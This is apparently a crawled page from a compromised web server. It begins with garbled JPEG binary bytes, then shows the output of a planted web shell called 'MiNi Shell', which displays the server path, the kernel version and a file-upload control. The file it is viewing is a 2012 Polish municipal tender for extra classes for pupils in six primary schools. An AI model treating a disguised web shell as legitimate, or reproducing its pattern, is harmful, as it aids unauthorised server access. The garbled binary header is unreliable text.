JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/110400-N-2012.html

<p class="kh_header"><b>Nowa Wieś Lęborska: Organizacja i prowadzenie zajęć dodatkowych dla uczniów w sześciu szkołach podstawowych Gminy Nowa Wieś Lęborska w latach szkolnych 2011/2012 i 2012/2013</b><br>
<b>Numer ogłoszenia: 110400 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowa Wieś Lęborska , ul. Grunwaldzka 24, 84-351 Nowa Wieś Lęborska, woj. pomorskie, tel. 059  8612428 w. 34, faks 059 8612164.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.nwl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i prowadzenie zajęć dodatkowych dla uczniów w sześciu szkołach podstawowych Gminy Nowa Wieś Lęborska w latach szkolnych 2011/2012 i 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest organizacja i prowadzenie zajęć dodatkowych 
w sześciu szkołach podstawowych Gminy Nowa Wieś Lęborska w latach szkolnych 2011/2012 i 2012/2013 w ramach projektu Inwestycja w dziecko, inwestycją we wspólną przyszłość współfinansowanego ze środków Unii Europejskiej w ramach POKL Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych.
2.	Zajęcia dodatkowe będą prowadzone w 6 szkołach w Gminie Nowa Wieś Lęborska, zgodnie z szczegółowym wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danych części zamówienia - załącznik nr 5 do SIWZ.
3.	Zajęcia będą prowadzone z podziałem na 3 okresy rozliczeniowe:
1 okres: V-VI 2012; 2 okres: IX - XII 2012; 3 okres: I - VI 2013
- zgodnie z zapisami w załączniku nr 5 do SIWZ.
4.	Projekt ma na celu przede wszystkim wsparcie indywidualnego rozwoju osobistego każdego ucznia poprzez dostosowanie wsparcia do jego indywidualnych potrzeb. 
5.	Wykonawca zobowiązany będzie do opracowania, w terminie 7 dni od daty zawarcia umowy/ kolejno okresu rozliczeniowego/ programu i planu pracy zajęć dodatkowych w porozumieniu ze szkołą w której przeprowadzane będą zajęcia oraz przedstawienia tych dokumentów do akceptacji koordynatorowi projektu. 
6.	Godzina zajęć rozwijających, dydaktyczno-wyrównawczych i gimnastyki korekcyjnej będzie trwała 45 minut, godzina zajęć logopedycznych będzie trwała 60 minut.
7.	Uczestnicy zajęć dodatkowych zostaną wytypowani spośród uczniów danej placówki przez organ prowadzący szkołę.
8.	Program powinien być zgodny z wytycznymi zawartymi w rozporządzeniu Ministra Edukacji Narodowej z dnia 8 czerwca 2009 r. w sprawie dopuszczania do użytku w szkole programów wychowania przedszkolnego i programów nauczania oraz dopuszczania do użytku szkolnego podręczników (Dz. U. z 2009 r. nr 89, poz. 730).
9.	Wykonawca przed przygotowaniem dokumentów, o których mowa w ust. 5 powinien zapoznać się z następującymi dokumentami:
9.1.	Wnioskiem o dofinansowanie projektu Inwestycja w dziecko, inwestycją we wspólną przyszłość  dokument zostanie udostępniony przez koordynatora po zawarciu umowy.
9.2.	Zasadami przygotowania, realizacji i rozliczania projektów systemowych w zakresie indywidualizacji nauczania realizowanych przez organ prowadzące szkoły w ramach Programu Operacyjnego Kapitał Ludzki   dokumenty te będą udostępnione przez koordynatora po zawarciu umowy.
9.3.	Dokumentacją systemową Programu Operacyjnego Kapitał Ludzki Priorytet IX, Działanie 9.1 Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych,
 dokumenty te będą udostępnione przez koordynatora po zawarciu umowy.
9.4.	Diagnozą i analizą potrzeb uczniów klas I-III szkół podstawowych biorących udział w projekcie, przeprowadzaną przez powołany do tego celu w każdej ze szkół zespół nauczycieli - dokumenty te będą udostępnione przez daną szkołę po zawarciu umowy.
10.	Wykonawca zobowiązany będzie do dokumentowania zajęć dodatkowych poprzez przygotowywanie i przekazywanie w terminie do 7 dni po zakończeniu każdego okresu rozliczeniowego do akceptacji koordynatorowi projektu: kart czasu pracy i harmonogramu przeprowadzonych zajęć. 
11.	Wykonawca zobowiązany będzie do prowadzenia dzienników zajęć dodatkowych zgodnie z obowiązującymi przepisami.
12.	Wykonawca zobowiązany będzie do wspomagania promocji i ewaluacji projektu - informowanie o współfinansowaniu Projektu i niniejszej umowy ze środków Europejskiego Funduszu Społecznego oraz współpraca z Koordynatorem projektu w mierzeniu postępów uczniów w zakresie rezultatów Projektu,
13.	Wykonawca zobowiązany będzie do dokonywania ewaluacji pracy dla zajęć pozalekcyjnych oraz dokonywania ewaluacji osiągnięć rozwojowych ucznia (Beneficjentów Ostatecznych) pod kątem rozwoju postaw, umiejętności i poziomu wiedzy, w tym w zakresie rezultatów wskazanych w projekcie.
14.	Wykonawca zapewni prowadzenie zajęć metodami aktywizującymi z wykorzystaniem zakupionych przez Gminę w ramach projektu pomocy i materiałów dydaktycznych.
15.	W przypadku niemożności prowadzenia usługi edukacyjnej, Wykonawca zobowiązany będzie zapewnić zastępstwo osoby o wymaganych w postępowaniu w danej części kwalifikacjach, po wcześniejszym pisemnym poinformowaniu o zaistniałej sytuacji koordynatora projektu i uzyskaniu jego zgody.
16.	Zamawiający zobowiązuje się udostępnić bezpłatnie sale oraz pomoce dydaktyczne niezbędne do prawidłowego wykonania przedmiotu zamówienia.
17.	Wykonawca zobowiązuje się do niezwłocznego informowania w formie pisemnej zamawiającego o problemach w realizacji projektu, w szczególności o zamiarze zaprzestania realizacji projektu;
18.	Zamawiający dopuszcza złożenie oferty częściowej dla 21 części zamówienia:
Część Nr 1: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu -  Z. S. Nowa Wieś Lęborska.
Część Nr 2: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych -  Z. S. Nowa Wieś Lęborska.
Część Nr 3: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy -  Z. S. Nowa Wieś Lęborska.
Część Nr 4: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - Z. S. Łebień.
Część Nr 5: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - Z. S. Łebień.
Część Nr 6: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - Z. S. Łebień.
Część Nr 7: Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy - Z. S. Łebień.
Część Nr 8: Zajęcia rozwijających dla uczniów szczególnie uzdolnionych artystycznie - Z. S. Łebień.
Część Nr 9: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - Z.S. Garczegorze.
Część Nr 10: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - Z.S. Garczegorze.
Część Nr 11: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - Z.S. Garczegorze.
Część Nr 12: Zajęcia z gimnastyki korekcyjnej dla dzieci z wadami postawy - Z.S. Garczegorze.
Część Nr 13: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - Z. S. Leśnice.
Część Nr 14: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - Z. S. Leśnice.
Część Nr 15: Zajęcia rozwijające dla uczniów szczególnie uzdolnionych artystycznie  - Z. S. Leśnice.
Część Nr 16: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu-- Z.S. Redkowice.
Część Nr 17: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych-- Z.S. Redkowice.
Część Nr 18: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy-- Z.S. Redkowice.
Część Nr 19: Zajęcia rozwijające dla uczniów  szczególnie uzdolnionych teatralnie-- Z.S. Redkowice.
Część Nr 20: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - S. P.  Tawęcino.
Część Nr 21: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - S. P.  Tawęcino.
Szczegółowy opis i zakres dla danej części zamówienia znajduje się w dziale 4. SIWZ i załączniku nr 5 do SIWZ - szczegółowym wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danych części zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia - Załącznik Nr 2 do SIWZ. Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia - Załącznik Nr 2 do SIWZ. Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia - Załącznik Nr 2 do SIWZ. Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie dysponowania przez Wykonawcą co najmniej jedną osobą, która
a)	do części zamówienia nr 1, 2,4, 5, 8, 9, 10, 13,14, 15, 16, 17, 19,20,21.
posiada kwalifikacje do zajmowania stanowiska nauczyciela w klasach I-III  szkół podstawowych zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400) .
b)	do części zamówienia nr 3, 6, 11, 18  - 
posiada kwalifikacje wymagane do  zajmowania stanowiska nauczyciela-logopedy w szkołach zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400) .
c)	 do części zamówienia nr 7, 12 - 
 posiada kwalifikacje wymagane do zajmowania stanowiska nauczyciela- wychowania fizycznego w szkołach przy zajęciach realizowanych w formach pozalekcyjnych, zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400) .

Ocena dokonana zostanie wg formuły spełnia - nie spełnia na podstawie treści złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu Załącznik Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia - Załącznik Nr 2 do SIWZ. Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy stanowiący (załącznik nr 1 do SIWZ)
2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki udziału w postępowaniu winien spełniać jeden Wykonawca lub Wykonawcy wspólnie, zaś każdy z Wykonawców z osobna winien potwierdzić niepodleganie wykluczeniu z postępowania.
3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia obowiązani są załączyć do oferty pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
4)	Zamawiający wymaga wskazania w ofercie części zamówienia, których wykonanie Wykonawca zamierza powierzyć Podwykonawcom (jeżeli Wykonawca przewiduje taki udział).
5)	W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia lub inny dokument pisemny, potwierdzający ten fakt. 

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedstawia dokumenty jak wyżej, wypełnione w języku polskim bądź z tłumaczeniem na język polski potwierdzone za zgodność z oryginałem przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający określa warunki umowy na realizację zamówienia w niniejszym postępowaniu w Projekcie Umowy, który stanowi zał. nr 4 do SIWZ. Postanowienia oraz zobowiązania przyjęte przez Wykonawcę poprzez złożenie oferty dla danej części zamówienia odpowiadającej SIWZ, a także wybór tak skonstruowanej oferty przez Zamawiającego stanowią integralną część umowy na realizację przedmiotu zamówienia.
2.	Nie dopuszcza się jakichkolwiek zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem postanowień pkt. 3 niniejszego rozdziału.
3.	Zgodnie z przepisem art. 144 ustawy - Prawo zamówień publicznych Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Warunki zmiany umowy:
A.	w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy,
B.	w przypadku wystąpienia zmian w projekcie Inwestycja w dziecko, inwestycją we wspólną przyszłość w zakresie mającym wpływ na realizację umowy.
4.	Zmiany umowy, o których mowa w ust. 3, nie mogą skutkować podwyższeniem wynagrodzenia Wykonawcy.
5.	Zmiany umowy, o których mowa w ust. 3, wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.nwl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędu Gminy Nowa Wieś Lęborska, ul. Grunwaldzka 24, 84 - 351 Nowa Wieś Lęborska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 10:00, miejsce: Urzędu Gminy Nowa Wieś Lęborska, ul. Grunwaldzka 24, 84 - 351 Nowa Wieś Lęborska, pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu
Inwestycja w dziecko, inwestycją we wspólna przyszłość
współfinansowanego ze środków Unii Europejskiej w ramach POKL
Priorytet IX Rozwój wykształcenia i kompetencji w regionach
Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty
Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
Indywidualizacja procesu nauczania i wychowania
uczniów klas I-III szkół podstawowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu -  Z. S. Nowa Wieś Lęborska..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Nowej Wsi Lęborskiej - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w łącznej liczbie godzin 140.
Zajęcia w każdym roku szkolnym będą prowadzone w dwóch grupach, każda będzie liczyła po 8 uczniów. Liczba godzin w roku 2012 wyniesie: 94 , natomiast w roku 2013  liczba godzin wyniesie 46. 
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu mają być odpowiedzią na potrzeby stymulowania, usprawniania zaburzonych procesów psychomotorycznych istotnych w opanowaniu umiejętności czytania i pisania. Wczesna pomoc uczniom, którzy zostaną objęci wsparciem w ramach tych zajęć oraz zapewnienie dogodnych warunków przyswajania przez nich wiedzy w odpowiednim tempie pozwoli na niepogłębienie barier w opanowywaniu treści również z innych przedmiotów. Zajęcia mają wpłynąć na rozwój kompetencji kluczowej tj. porozumiewanie się językiem ojczystym.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  -  Z. S.  Nowa Wieś Lęborska..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa edukacyjna dla uczniów klas I-III Zespołu Szkół w Nowej Wsi Lęborskiej - Szkoła Podstawowa - organizacja i prowadzenie w latach szkolnych 2011/2012 i 2012/2013 zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w łącznej liczbie godzin 140.
Zajęcia w każdym roku szkolnym będą prowadzone w dwóch grupach, każda będzie liczyła po 8 uczniów. Liczba godzin w roku 2012 wyniesie: 94 , natomiast w roku 2013  liczba godzin wyniesie 46. 
Zajęcia mają na celu zmniejszenie trudności w logicznym myśleniu, abstrahowaniu i rachunku pamięciowym tj. trudności w zdobywaniu umiejętności matematycznych u uczniów objętych wsparciem w ramach projektu. Zajęcia mają umożliwić zastosowanie wiedzy matematyczno - przyrodniczej do wyjaśniania zjawisk występujących w otaczającej rzeczywistości.
Szczegółowy wykaz godzin i liczby uczniów w poszczególnych grupach z podziałem dla danej części zamówienia znajduje się w  Załączniku nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
